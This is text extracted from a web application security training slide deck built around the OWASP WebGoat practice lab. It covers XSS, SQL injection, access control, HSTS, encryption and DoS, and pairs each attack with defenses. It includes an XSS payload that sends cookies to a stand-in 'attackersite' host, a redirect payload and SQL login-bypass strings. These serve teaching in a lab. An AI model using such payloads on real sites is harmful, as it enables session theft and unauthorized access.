Topics include:
- Sample and Demo of Top Application Risks — Cross Site Scripting, SQL Injection, Access Control
- Who’s Monitoring Your Traffic? — Encrypting in Transit
Secure Data Storage & Protection — Correct Password
-Storage & Data Protection
-Growing Threats Plaguing Applications
4. “The global cost of cybercrime is greater than the combined effect on
the global economy of trafficking in marijuana, heroin and cocaine”
!
h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking
h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
5. Data Loss & Breaches
datalossdb.org
Verizon Data Breach
Report 2013
7. Security - Into The Details
•
Sample and Demo of Top Application Risks
— Cross Site Scripting, SQL Injection, Access
Control
•
Who’s Monitoring Your Traffic?
— Encrypting in Transit
•
Secure Data Storage & Protection
— Correct Password Storage & Data Protection
•
Growing Threats Plaguing Applications
10. What are Web Requests
Open console & enter the following:
•
telnet google.com 80
GET / HTTP/1.1
•
Hit return 2 times
11. Cross Site Scripting (XSS)
•
Problem: User controlled data returned in HTTP
response contains HTML/JavaScript code
•
Impact: Session Hijacking, Full Control of Page,
Malicious Redirects
•
Basic XSS Test:
" ><script>alert(document.cookie)</script>
•
Cookie Theft Example:
"><script>document.location='http://attackersite/
'+document.cookie</script>
12. XSS Behind The Scenes
http://shinypage.com?user=Bob
JSP Code
<h1>Glad to see you <%= request.getParameter("name") %></h1>
HTML Source
Rendered HTML
<div>Glad to see you <b>Bob</b></div>
15. Cross Site Scripting
•
Cross Site Scripting typically uses JavaScript to
do bad things
•
Steal session cookies
<script>alert(document.cookie)</script>
•
Redirect to bad pages
<script>window.location = "http://evilsite.com/"</script>
•
Rewrite page on the fly
24. SQL Injection
•
Problem: User controlled data improperly used with SQL
statements
•
Impact: Arbitrary SQL Execution, Data Corruption, Data
Theft
•
Basic SQL Injection Tests:
OR 1=1 --
' OR '1'= '1'--
•
Example Vulnerable Query:
sqlQ = “Select user from UserTable where name=
'+username+ ' and pass = '+password+ ' ”
26. SQL Injection
•
Lesson: Injection Flaws ->
Lab: SQL Injection ->
Stage 1: String SQL
Injection
•
Proxy Needed
•
Objective: Bypass the
login page by inserting
“control” characters.
Login as “Neville” w/o
knowledge of the
password
27. SQL Injection
•
HTTP Post
employee_id=112&password=x' OR ‘1'='1 &action=Login
•
Vulnerable SQL
Select user from UserTable where name= '+username+ '
and pass = '+password+ ‘
•
Resulting Statement
Select user from UserTable where name= '112' and
pass = 'x' OR '1'='1'
•
Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
28. SQL Injection
•
Parameterized Queries
No confusion with control characters
Example: would look for password of ‘ or ‘1’=’1
•
Input Validation
Are special characters needed for most fields?
What about non-printable characters %00-%0A?
30. Access Control
•
Problem: Developers assume some parts of app can’t be seen,
tampered with or invoked by the user
•
Impact: Unauthorized data access, access to privileged
functionality
•
Basic Access Control Test: Inspect HTTP requests - iterate
numbers, guess other values for arguments
•
Access Control Failure Example:!
•
http://somebadbank.com/showacct?id=101
•
http://somebadbank.com/showacct?id=102
32. Access Control Violation
•
Lesson: Access Control Flaws>LAB: Role Based Access
Control->Stage 1: Bypass
Business Layer Access Control
•
Proxy Needed
•
Objective: Find way to execute
“delete” functionality using Tom’s
account. Delete account “tom”
33. Access Control Violation
•
Hint: Login with Tom and perform available
actions (search staff, view profile). Figure out
how action name is sent to server
POST /webgoat/attack?Screen=43&menu=200
HTTP/1.1
Host: localhost
!
employee_id=105&action=ViewProfile
34. Strong Access Controls
•
Access Control Performed Server Side
•
Never Relies Upon “Security by Obscurity”
•
Be Careful with Identifiers (e.g. id=123)
•
Attacker Can Send Anything in Request
•
Presentation Layer Controls Can Not Enforce
Access Control
39. Secure Design for
Communication
•
Use HTTPS Throughout Web Site!
•
HTTP Strict Transport Security (HSTS)!
•
•
•
Opt-in security control
Website instructs compatible browser to enable STS for site
HSTS Forces (for enabled site):
•
All communication over HTTPS
•
No insecure HTTP requests sent from browser
•
No option for user to override untrusted certificates
40. Strict Transport Security
•
Browser prevents HTTP requests to HSTS site
•
Any request to site is “upgraded” to HTTPS
•
No clear text HTTP traffic ever sent to HSTS site
•
Browser assumes HTTPS for HSTS sites
45. Encrypting Sensitive Data in
Database
Encrypt
User Data
Customer/Group
Encryption Key
Key Encrypting Key
database
Decrypt
Hardware Security Module
Encrypted
[Customer/Group
Encryption Key]
Encryption within Database
Unique keys per data region
Key encrypting keys
Hardware Security Modules
(
48. Denial of Service
Network DDOS
Application Layer DDOS
site.com/generateReport
Exhaust Network!
Bandwidth
Exhaust Server !
CPU/Memory
49. Application Denial of
Service
Application DDOS !
Traditional Network DDOS !
•
overwhelms target with
volume
•
•
•
•
exhausts bandwidth /
capacity of network
devices
invokes
computationally intense
application functions
•
exhausts CPU /
memory of web servers
Requires large number
of machines
•
Requires few machines
•
Defenses: Few
available, must
customize
Defenses: CDN, antiDDOS services
51. Take Aways
•
Understand top security threats and anticipate
potential malicious use of application to design
secure code
•
Multiple controls possible to protect sensitive data
in transit and storage
•
Understand emerging threats to plan for
appropriate defenses
•
Use OWASP BWA Security Lab and learn more!
55. Test Connectivity to VM
1.Open Browser
2.Browse to your VM ip (listed in
VM login page)
•
e.g. http://192.168.56.101
3.Should see OWASP BWA
welcome page
4.Error? Check ip address of VM
57. Understanding the Proxy
•
Proxy is middle-man between browser and web
server
•
Assists with traffic manipulation & inspection
Attacker’s
Browser
Web Proxy
Web Server
61. Set Firefox Proxy
•
Set Firefox proxy to 8080
•
Preferences
-> Advanced
-> Network
-> Settings
•
Set HTTP Proxy
•
Important - clear
“No Proxy for” line
63. Intercepting Traffic
•
Add a “breakpoint” by right clicking on the page and choosing
“Break...”
!
!
!
!
•
Refresh the webpage - it will hang
•
Modify the request as needed, then press the “Continue” button
64. “Hello World” of Proxies
•
Lesson: General->Http Basic
•
Objective:
•
Enter your name into text box
•
Intercept with proxy & change entered name to different value
•
Receive response & observe modified value is reversed
Joe
Sue
euS
Attacker’s euS
Web Proxy
Browser
Web Server